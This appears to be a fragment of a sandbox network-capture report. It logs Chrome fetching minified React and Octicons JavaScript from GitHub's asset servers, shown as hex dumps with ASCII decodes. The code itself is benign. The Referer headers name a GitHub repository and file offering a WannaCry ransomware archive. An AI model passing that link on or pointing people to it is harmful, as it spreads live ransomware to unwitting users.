                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.1649749185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC645OUTGET /assets/react-lib-1fbfc5be2c18.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC690INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 210512
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:32 GMT
                                                                                      ETag: 0x8DBD4BAB2A79ED8
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 2534664
                                                                                      X-Served-By: cache-iad-kcgs7200091-IAD, cache-ewr18182-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1542, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: d6fa7e138f7db0e317451e06c993df0e00703c78
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 72 65 61 63 74 2d 6c 69 62 22 5d 2c 7b 38 37 37 37 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2d 64 6f 6d 2d 73 65 72 76 65 72 2d 6c 65 67 61 63 79 2e 62 72 6f 77 73 65 72 2e 70 72 6f 64 75 63 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["react-lib"],{87774:(e,t,n)=>{/** * @license React * react-dom-server-legacy.browser.production.min.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source cod
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 45 6d 70 74 79 53 74 72 69 6e 67 3d 6f 7d 76 61 72 20 66 3d 7b 7d 3b 22 63 68 69 6c 64 72 65 6e 20 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 20 64 65 66 61 75 6c 74 56 61 6c 75 65 20 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 20 69 6e 6e 65 72 48 54 4d 4c 20 73 75 70 70 72 65 73 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 57 61 72 6e 69 6e 67 20 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 20 73 74 79 6c 65 22 2e 73 70 6c 69 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 5b 65 5d 3d 6e 65 77 20 63 28 65 2c 30 2c 21 31 2c 65 2c 6e 75 6c 6c 2c 21 31 2c 21 31 29 7d 29 2c 5b 5b 22 61 63 63 65 70 74 43 68 61 72 73 65 74 22 2c 22 61 63 63 65 70 74 2d 63 68 61 72 73 65
                                                                                      Data Ascii: EmptyString=o}var f={};"children dangerouslySetInnerHTML defaultValue defaultChecked innerHTML suppressContentEditableWarning suppressHydrationWarning style".split(" ").forEach(function(e){f[e]=new c(e,0,!1,e,null,!1,!1)}),[["acceptCharset","accept-charse
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 68 74 20 61 6c 69 67 6e 6d 65 6e 74 2d 62 61 73 65 6c 69 6e 65 20 61 72 61 62 69 63 2d 66 6f 72 6d 20 62 61 73 65 6c 69 6e 65 2d 73 68 69 66 74 20 63 61 70 2d 68 65 69 67 68 74 20 63 6c 69 70 2d 70 61 74 68 20 63 6c 69 70 2d 72 75 6c 65 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 20 63 6f 6c 6f 72 2d 70 72 6f 66 69 6c 65 20 63 6f 6c 6f 72 2d 72 65 6e 64 65 72 69 6e 67 20 64 6f 6d 69 6e 61 6e 74 2d 62 61 73 65 6c 69 6e 65 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 20 66 69 6c 6c 2d 6f 70 61 63 69 74 79 20 66 69 6c 6c 2d 72 75 6c 65 20 66 6c 6f 6f 64 2d 63 6f 6c 6f 72 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 20
                                                                                      Data Ascii: ht alignment-baseline arabic-form baseline-shift cap-height clip-path clip-rule color-interpolation color-interpolation-filters color-profile color-rendering dominant-baseline enable-background fill-opacity fill-rule flood-color flood-opacity font-family
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 64 2c 70 29 3b 66 5b 74 5d 3d 6e 65 77 20 63 28 74 2c 31 2c 21 31 2c 65 2c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 58 4d 4c 2f 31 39 39 38 2f 6e 61 6d 65 73 70 61 63 65 22 2c 21 31 2c 21 31 29 7d 29 2c 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 63 72 6f 73 73 4f 72 69 67 69 6e 22 5d 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 5b 65 5d 3d 6e 65 77 20 63 28 65 2c 31 2c 21 31 2c 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 75 6c 6c 2c 21 31 2c 21 31 29 7d 29 2c 66 2e 78 6c 69 6e 6b 48 72 65 66 3d 6e 65 77 20 63 28 22 78 6c 69 6e 6b 48 72 65 66 22 2c 31 2c 21 31 2c 22 78 6c 69 6e 6b 3a 68 72 65 66 22 2c 22 68
                                                                                      Data Ascii: .forEach(function(e){var t=e.replace(d,p);f[t]=new c(t,1,!1,e,"http://www.w3.org/XML/1998/namespace",!1,!1)}),["tabIndex","crossOrigin"].forEach(function(e){f[e]=new c(e,1,!1,e.toLowerCase(),null,!1,!1)}),f.xlinkHref=new c("xlinkHref",1,!1,"xlink:href","h
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 71 75 6f 74 3b 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 38 3a 74 3d 22 26 61 6d 70 3b 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 3d 22 26 23 78 32 37 3b 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 36 30 3a 74 3d 22 26 6c 74 3b 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 36 32 3a 74 3d 22 26 67 74 3b 22 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 63 6f 6e 74 69 6e 75 65 7d 61 21 3d 3d 6e 26 26 28 72 2b 3d 65 2e 73 75 62 73 74 72 69 6e 67 28 61 2c 6e 29 29 2c 61 3d 6e 2b 31 2c 72 2b 3d 74 7d 65 3d 61 21 3d 3d 6e 3f 72 2b 65 2e 73 75 62 73 74 72 69 6e 67 28 61 2c 6e 29 3a 72 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 76 3d 2f 28 5b 41 2d 5a 5d 29 2f 67 2c 62 3d 2f 5e 6d 73 2d 2f 2c 6b 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 3b 66 75 6e 63 74 69 6f 6e 20 77
                                                                                      Data Ascii: quot;";break;case 38:t="&amp;";break;case 39:t="&#x27;";break;case 60:t="&lt;";break;case 62:t="&gt;";break;default:continue}a!==n&&(r+=e.substring(a,n)),a=n+1,r+=t}e=a!==n?r+e.substring(a,n):r}return e}var v=/([A-Z])/g,b=/^ms-/,k=Array.isArray;function w
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 26 26 65 2e 70 75 73 68 28 22 20 22 2c 6e 2c 27 3d 22 27 2c 79 28 72 29 2c 27 22 27 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 2e 73 61 6e 69 74 69 7a 65 55 52 4c 26 26 28 72 3d 22 22 2b 72 29 2c 65 2e 70 75 73 68 28 22 20 22 2c 6e 2c 27 3d 22 27 2c 79 28 72 29 2c 27 22 27 29 7d 7d 65 6c 73 65 20 69 66 28 73 28 6e 29 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 72 29 7b 63 61 73 65 22 66 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 22 73 79 6d 62 6f 6c 22 3a 72 65 74 75 72 6e 3b 63 61 73 65 22 62 6f 6f 6c 65 61 6e 22 3a 69 66 28 22 64 61 74 61 2d 22 21 3d 3d 28 74 3d 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 73 6c 69 63 65 28 30 2c 35 29 29 26 26 22 61 72 69 61 2d 22 21 3d 3d 74 29 72 65 74 75 72 6e 7d 65 2e 70 75 73 68 28 22 20 22 2c 6e 2c
                                                                                      Data Ascii: r&&e.push(" ",n,'="',y(r),'"');break;default:t.sanitizeURL&&(r=""+r),e.push(" ",n,'="',y(r),'"')}}else if(s(n)){switch(typeof r){case"function":case"symbol":return;case"boolean":if("data-"!==(t=n.toLowerCase().slice(0,5))&&"aria-"!==t)return}e.push(" ",n,
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 29 7b 72 65 74 75 72 6e 20 6e 2e 67 65 6e 65 72 61 74 65 53 74 61 74 69 63 4d 61 72 6b 75 70 3f 28 65 2e 70 75 73 68 28 79 28 74 29 29 2c 21 31 29 3a 28 22 22 3d 3d 3d 74 3f 65 3d 72 3a 28 72 26 26 65 2e 70 75 73 68 28 22 3c 21 2d 2d 20 2d 2d 3e 22 29 2c 65 2e 70 75 73 68 28 79 28 74 29 29 2c 65 3d 21 30 29 2c 65 29 7d 76 61 72 20 4d 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2c 49 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 65 6c 65 6d 65 6e 74 22 29 2c 44 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 70 6f 72 74 61 6c 22 29 2c 4f 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 22 29 2c 42 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 73 74 72 69 63 74 5f 6d 6f 64 65 22 29 2c 55 3d 53
                                                                                      Data Ascii: r){return n.generateStaticMarkup?(e.push(y(t)),!1):(""===t?e=r:(r&&e.push("... -->"),e.push(y(t)),e=!0),e)}var M=Object.assign,I=Symbol.for("react.element"),D=Symbol.for("react.portal"),O=Symbol.for("react.fragment"),B=Symbol.for("react.strict_mode"),U=S
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6e 20 65 28 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 2e 70 61 72 65 6e 74 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 61 28 34 30 32 29 29 3b 74 2e 64 65 70 74 68 3d 3d 3d 72 2e 64 65 70 74 68 3f 65 74 28 74 2c 72 29 3a 65 28 74 2c 72 29 2c 6e 2e 63 6f 6e 74 65 78 74 2e 5f 63 75 72 72 65 6e 74 56 61 6c 75 65 32 3d 6e 2e 76 61 6c 75 65 7d 28 74 2c 65 29 2c 65 65 3d 65 29 7d 76 61 72 20 65 72 3d 7b 69 73 4d 6f 75 6e 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 31 7d 2c 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 75 6c 6c 21 3d 3d 28 65 3d 65 2e 5f 72 65 61 63 74 49 6e 74 65 72 6e 61 6c 73 29 2e 71 75 65 75 65 26 26 65 2e 71 75 65 75 65 2e 70 75 73 68 28 74 29 7d
                                                                                      Data Ascii: n e(t,n){var r=n.parent;if(null===r)throw Error(a(402));t.depth===r.depth?et(t,r):e(t,r),n.context._currentValue2=n.value}(t,e),ee=e)}var er={isMounted:function(){return!1},enqueueSetState:function(e,t){null!==(e=e._reactInternals).queue&&e.queue.push(t)}
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 66 6c 6f 77 3a 22 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 65 6f 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 69 64 3b 65 3d 65 2e 6f 76 65 72 66 6c 6f 77 3b 76 61 72 20 61 3d 33 32 2d 65 75 28 72 29 2d 31 3b 72 26 3d 7e 28 31 3c 3c 61 29 2c 6e 2b 3d 31 3b 76 61 72 20 6c 3d 33 32 2d 65 75 28 74 29 2b 61 3b 69 66 28 33 30 3c 6c 29 7b 76 61 72 20 6f 3d 61 2d 61 25 35 3b 72 65 74 75 72 6e 20 6c 3d 28 72 26 28 31 3c 3c 6f 29 2d 31 29 2e 74 6f 53 74 72 69 6e 67 28 33 32 29 2c 72 3e 3e 3d 6f 2c 61 2d 3d 6f 2c 7b 69 64 3a 31 3c 3c 33 32 2d 65 75 28 74 29 2b 61 7c 6e 3c 3c 61 7c 72 2c 6f 76 65 72 66 6c 6f 77 3a 6c 2b 65 7d 7d 72 65 74 75 72 6e 7b 69 64 3a 31 3c 3c 6c 7c 6e 3c 3c 61 7c 72 2c 6f 76 65 72 66 6c 6f 77 3a 65 7d 7d 76 61 72 20 65 75 3d 4d 61 74 68 2e
                                                                                      Data Ascii: rflow:""};function eo(e,t,n){var r=e.id;e=e.overflow;var a=32-eu(r)-1;r&=~(1<<a),n+=1;var l=32-eu(t)+a;if(30<l){var o=a-a%5;return l=(r&(1<<o)-1).toString(32),r>>=o,a-=o,{id:1<<32-eu(t)+a|n<<a|r,overflow:l+e}}return{id:1<<l|n<<a|r,overflow:e}}var eu=Math.
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 7b 76 61 72 20 6e 3d 65 68 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6e 26 26 6e 75 6c 6c 21 3d 3d 74 29 7b 76 61 72 20 72 3d 6e 5b 31 5d 3b 65 3a 69 66 28 6e 75 6c 6c 3d 3d 3d 72 29 72 3d 21 31 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 72 2e 6c 65 6e 67 74 68 26 26 61 3c 74 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 69 66 28 21 65 63 28 74 5b 61 5d 2c 72 5b 61 5d 29 29 7b 72 3d 21 31 3b 62 72 65 61 6b 20 65 7d 72 3d 21 30 7d 69 66 28 72 29 72 65 74 75 72 6e 20 6e 5b 30 5d 7d 7d 72 65 74 75 72 6e 20 65 3d 65 28 29 2c 65 68 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 5b 65 2c 74 5d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 65 54 28 65 2c 74 2c 6e 29 7b 69 66 28 32 35 3c 3d 65 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28
                                                                                      Data Ascii: {var n=eh.memoizedState;if(null!==n&&null!==t){var r=n[1];e:if(null===r)r=!1;else{for(var a=0;a<r.length&&a<t.length;a++)if(!ec(t[a],r[a])){r=!1;break e}r=!0}if(r)return n[0]}}return e=e(),eh.memoizedState=[e,t],e}function eT(e,t,n){if(25<=eb)throw Error(


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.1649750185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC736OUTGET /assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c-a58d7c11e858.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 725338
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Mon, 11 Mar 2024 19:26:13 GMT
                                                                                      ETag: 0x8DC42011D2D9A76
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 926271
                                                                                      X-Served-By: cache-iad-kjyo7100025-IAD, cache-lga21970-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 102, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: d189bbe2e010ed330b2b6ab6f97ab68454f68fc0
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 6f 63 74 69 63 6f 6e 73 2d 72 65 61 63 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 2d 32 65 38 65 37 63 22 5d 2c 7b 38 35 35 32 39 3a 28 72 2c 65 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 65 29 2c 61 2e 64 28 65 2c 7b 41 63 63 65 73 73 69 62 69 6c 69 74 79 49 63 6f 6e 3a 28 29 3d 3e 6e 2c 41 63 63 65 73 73 69 62 69 6c 69 74 79 49 6e 73 65 74 49 63 6f 6e
                                                                                      Data Ascii: (globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c"],{85529:(r,e,a)=>{"use strict";a.r(e),a.d(e,{AccessibilityIcon:()=>n,AccessibilityInsetIcon
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 44 69 73 63 75 73 73 69 6f 6e 49 63 6f 6e 3a 28 29 3d 3e 72 73 2c 43 6f 6d 6d 65 6e 74 49 63 6f 6e 3a 28 29 3d 3e 72 64 2c 43 6f 6d 6d 69 74 49 63 6f 6e 3a 28 29 3d 3e 72 68 2c 43 6f 6e 74 61 69 6e 65 72 49 63 6f 6e 3a 28 29 3d 3e 72 76 2c 43 6f 70 69 6c 6f 74 45 72 72 6f 72 49 63 6f 6e 3a 28 29 3d 3e 72 62 2c 43 6f 70 69 6c 6f 74 49 63 6f 6e 3a 28 29 3d 3e 72 67 2c 43 6f 70 69 6c 6f 74 57 61 72 6e 69 6e 67 49 63 6f 6e 3a 28 29 3d 3e 72 75 2c 43 6f 70 79 49 63 6f 6e 3a 28 29 3d 3e 72 66 2c 43 70 75 49 63 6f 6e 3a 28 29 3d 3e 72 6d 2c 43 72 65 64 69 74 43 61 72 64 49 63 6f 6e 3a 28 29 3d 3e 72 70 2c 43 72 6f 73 73 52 65 66 65 72 65 6e 63 65 49 63 6f 6e 3a 28 29 3d 3e 72 43 2c 44 61 73 68 49 63 6f 6e 3a 28 29 3d 3e 72 77 2c 44 61 74 61 62 61 73 65 49 63 6f
                                                                                      Data Ascii: DiscussionIcon:()=>rs,CommentIcon:()=>rd,CommitIcon:()=>rh,ContainerIcon:()=>rv,CopilotErrorIcon:()=>rb,CopilotIcon:()=>rg,CopilotWarningIcon:()=>ru,CopyIcon:()=>rf,CpuIcon:()=>rm,CreditCardIcon:()=>rp,CrossReferenceIcon:()=>rC,DashIcon:()=>rw,DatabaseIco
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 79 46 69 6c 6c 49 63 6f 6e 3a 28 29 3d 3e 65 69 2c 46 69 6c 65 44 69 72 65 63 74 6f 72 79 49 63 6f 6e 3a 28 29 3d 3e 65 6c 2c 46 69 6c 65 44 69 72 65 63 74 6f 72 79 4f 70 65 6e 46 69 6c 6c 49 63 6f 6e 3a 28 29 3d 3e 65 64 2c 46 69 6c 65 44 69 72 65 63 74 6f 72 79 53 79 6d 6c 69 6e 6b 49 63 6f 6e 3a 28 29 3d 3e 65 73 2c 46 69 6c 65 49 63 6f 6e 3a 28 29 3d 3e 65 65 2c 46 69 6c 65 4d 65 64 69 61 49 63 6f 6e 3a 28 29 3d 3e 65 68 2c 46 69 6c 65 4d 6f 76 65 64 49 63 6f 6e 3a 28 29 3d 3e 65 76 2c 46 69 6c 65 52 65 6d 6f 76 65 64 49 63 6f 6e 3a 28 29 3d 3e 65 67 2c 46 69 6c 65 53 75 62 6d 6f 64 75 6c 65 49 63 6f 6e 3a 28 29 3d 3e 65 62 2c 46 69 6c 65 53 79 6d 6c 69 6e 6b 46 69 6c 65 49 63 6f 6e 3a 28 29 3d 3e 65 75 2c 46 69 6c 65 5a 69 70 49 63 6f 6e 3a 28 29 3d
                                                                                      Data Ascii: yFillIcon:()=>ei,FileDirectoryIcon:()=>el,FileDirectoryOpenFillIcon:()=>ed,FileDirectorySymlinkIcon:()=>es,FileIcon:()=>ee,FileMediaIcon:()=>eh,FileMovedIcon:()=>ev,FileRemovedIcon:()=>eg,FileSubmoduleIcon:()=>eb,FileSymlinkFileIcon:()=>eu,FileZipIcon:()=
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 61 6c 2c 4c 6f 67 49 63 6f 6e 3a 28 29 3d 3e 61 69 2c 4c 6f 67 6f 47 69 73 74 49 63 6f 6e 3a 28 29 3d 3e 61 64 2c 4c 6f 67 6f 47 69 74 68 75 62 49 63 6f 6e 3a 28 29 3d 3e 61 73 2c 4d 61 69 6c 49 63 6f 6e 3a 28 29 3d 3e 61 68 2c 4d 61 72 6b 47 69 74 68 75 62 49 63 6f 6e 3a 28 29 3d 3e 61 76 2c 4d 61 72 6b 64 6f 77 6e 49 63 6f 6e 3a 28 29 3d 3e 61 67 2c 4d 65 67 61 70 68 6f 6e 65 49 63 6f 6e 3a 28 29 3d 3e 61 62 2c 4d 65 6e 74 69 6f 6e 49 63 6f 6e 3a 28 29 3d 3e 61 75 2c 4d 65 74 65 72 49 63 6f 6e 3a 28 29 3d 3e 61 66 2c 4d 69 6c 65 73 74 6f 6e 65 49 63 6f 6e 3a 28 29 3d 3e 61 6d 2c 4d 69 72 72 6f 72 49 63 6f 6e 3a 28 29 3d 3e 61 70 2c 4d 6f 6f 6e 49 63 6f 6e 3a 28 29 3d 3e 61 43 2c 4d 6f 72 74 61 72 42 6f 61 72 64 49 63 6f 6e 3a 28 29 3d 3e 61 77 2c 4d 6f
                                                                                      Data Ascii: al,LogIcon:()=>ai,LogoGistIcon:()=>ad,LogoGithubIcon:()=>as,MailIcon:()=>ah,MarkGithubIcon:()=>av,MarkdownIcon:()=>ag,MegaphoneIcon:()=>ab,MentionIcon:()=>au,MeterIcon:()=>af,MilestoneIcon:()=>am,MirrorIcon:()=>ap,MoonIcon:()=>aC,MortarBoardIcon:()=>aw,Mo
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 63 6f 6e 3a 28 29 3d 3e 6f 76 2c 53 63 72 65 65 6e 46 75 6c 6c 49 63 6f 6e 3a 28 29 3d 3e 6f 67 2c 53 63 72 65 65 6e 4e 6f 72 6d 61 6c 49 63 6f 6e 3a 28 29 3d 3e 6f 62 2c 53 65 61 72 63 68 49 63 6f 6e 3a 28 29 3d 3e 6f 75 2c 53 65 72 76 65 72 49 63 6f 6e 3a 28 29 3d 3e 6f 66 2c 53 68 61 72 65 41 6e 64 72 6f 69 64 49 63 6f 6e 3a 28 29 3d 3e 6f 70 2c 53 68 61 72 65 49 63 6f 6e 3a 28 29 3d 3e 6f 6d 2c 53 68 69 65 6c 64 43 68 65 63 6b 49 63 6f 6e 3a 28 29 3d 3e 6f 77 2c 53 68 69 65 6c 64 49 63 6f 6e 3a 28 29 3d 3e 6f 43 2c 53 68 69 65 6c 64 4c 6f 63 6b 49 63 6f 6e 3a 28 29 3d 3e 6f 6b 2c 53 68 69 65 6c 64 53 6c 61 73 68 49 63 6f 6e 3a 28 29 3d 3e 6f 79 2c 53 68 69 65 6c 64 58 49 63 6f 6e 3a 28 29 3d 3e 6f 78 2c 53 69 64 65 62 61 72 43 6f 6c 6c 61 70 73 65 49
                                                                                      Data Ascii: con:()=>ov,ScreenFullIcon:()=>og,ScreenNormalIcon:()=>ob,SearchIcon:()=>ou,ServerIcon:()=>of,ShareAndroidIcon:()=>op,ShareIcon:()=>om,ShieldCheckIcon:()=>ow,ShieldIcon:()=>oC,ShieldLockIcon:()=>ok,ShieldSlashIcon:()=>oy,ShieldXIcon:()=>ox,SidebarCollapseI
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 74 75 2c 57 65 62 68 6f 6f 6b 49 63 6f 6e 3a 28 29 3d 3e 74 66 2c 57 6f 72 6b 66 6c 6f 77 49 63 6f 6e 3a 28 29 3d 3e 74 6d 2c 58 43 69 72 63 6c 65 46 69 6c 6c 49 63 6f 6e 3a 28 29 3d 3e 74 77 2c 58 43 69 72 63 6c 65 49 63 6f 6e 3a 28 29 3d 3e 74 43 2c 58 49 63 6f 6e 3a 28 29 3d 3e 74 70 2c 5a 61 70 49 63 6f 6e 3a 28 29 3d 3e 74 6b 2c 5a 6f 6f 6d 49 6e 49 63 6f 6e 3a 28 29 3d 3e 74 79 2c 5a 6f 6f 6d 4f 75 74 49 63 6f 6e 3a 28 29 3d 3e 74 78 7d 29 3b 76 61 72 20 6f 3d 61 28 36 37 32 39 34 29 2c 74 3d 7b 73 6d 61 6c 6c 3a 31 36 2c 6d 65 64 69 75 6d 3a 33 32 2c 6c 61 72 67 65 3a 36 34 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 72 2c 65 2c 61 29 7b 76 61 72 20 63 3d 61 28 29 2c 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 29 2c 6c 3d 6f 2e 66 6f 72 77 61 72 64 52
